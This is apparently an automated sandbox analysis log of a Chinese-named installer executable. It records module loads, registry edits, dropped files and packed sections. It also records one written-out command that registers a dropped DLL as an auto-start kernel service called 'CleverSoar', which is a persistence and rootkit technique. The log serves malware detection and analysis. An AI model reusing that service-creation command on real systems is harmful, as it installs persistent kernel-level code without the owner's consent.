Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic file information: File size 7064515 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1430369809.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1430551725.00000000037B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00AF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,17_2_00AF57D0
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.drStatic PE information: real checksum: 0x0 should be: 0x343b7c
Source: update.vac.11.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.19.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.11.drStatic PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: real checksum: 0x0 should be: 0x6c7c7d
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x343b7c
Source: #U5b89#U88c5#U52a9#U624b2.0.5.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drStatic PE information: section name: .didata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.5.tmp.10.drStatic PE information: section name: .didata
Source: 7zr.exe.11.drStatic PE information: section name: .sxdata
Source: update.vac.11.drStatic PE information: section name: .00cfg
Source: update.vac.11.drStatic PE information: section name: .voltbl
Source: update.vac.11.drStatic PE information: section name: .#.q
Source: hrsw.vbc.11.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.11.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.11.drStatic PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C918C5B push ecx; ret 11_2_6C918C6E
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C7C0F00 push ss; retn 0001h11_2_6C7C0F0A
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E6F10 push eax; ret 11_2_6C9E6F2E
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C94B9F4 push 004AC35Ch; ret 11_2_6C94BA0E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A745F4 push 00B1C35Ch; ret 17_2_00A7460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0FB10 push eax; ret 17_2_00B0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B0FE90 push eax; ret 17_2_00B0FEBE
Source: update.vac.6.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.11.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.11.drStatic PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
